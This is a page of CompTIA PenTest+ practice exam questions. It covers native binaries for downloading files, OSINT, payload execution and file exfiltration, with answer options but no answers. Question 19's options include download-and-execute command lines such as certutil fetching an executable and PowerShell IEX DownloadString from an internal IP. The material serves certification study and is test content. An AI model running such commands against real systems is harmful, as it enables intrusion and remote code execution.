Summer Certification Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: save70

Full Access CompTIA PT0-003 Tutorials

Page: 5 / 25
Total 336 questions

CompTIA PenTest+ Exam Questions and Answers

Question 17

A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?

Options:

A.

netsh.exe

B.

certutil.exe

C.

nc.exe

D.

cmdkey.exe

Question 18

A penetration tester conducts OSINT for a client and discovers the robots.txt file explicitly blocks a major search engine. Which of the following would most likely help the penetration tester achieve the objective?

Options:

A.

Modifying the WAF

B.

Utilizing a CSRF attack

C.

Changing the robots.txt file

D.

Leveraging a competing provider

Question 19

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

A.

powershell.exe impo C:\tools\foo.ps1

B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe

C.

powershell.exe -noni -encode IEX.Downloadstring( " http://172.16.0.1/ " )

D.

rundll32.exe c:\path\foo.dll,functName

Question 20

Which of the following is the most efficient way to exfiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP.

B.

Compress the file and send it using TFTP.

C.

Split the file in tiny pieces and send it over dnscat.

D.

Encrypt and send the file over HTTPS.

Page: 5 / 25
Total 336 questions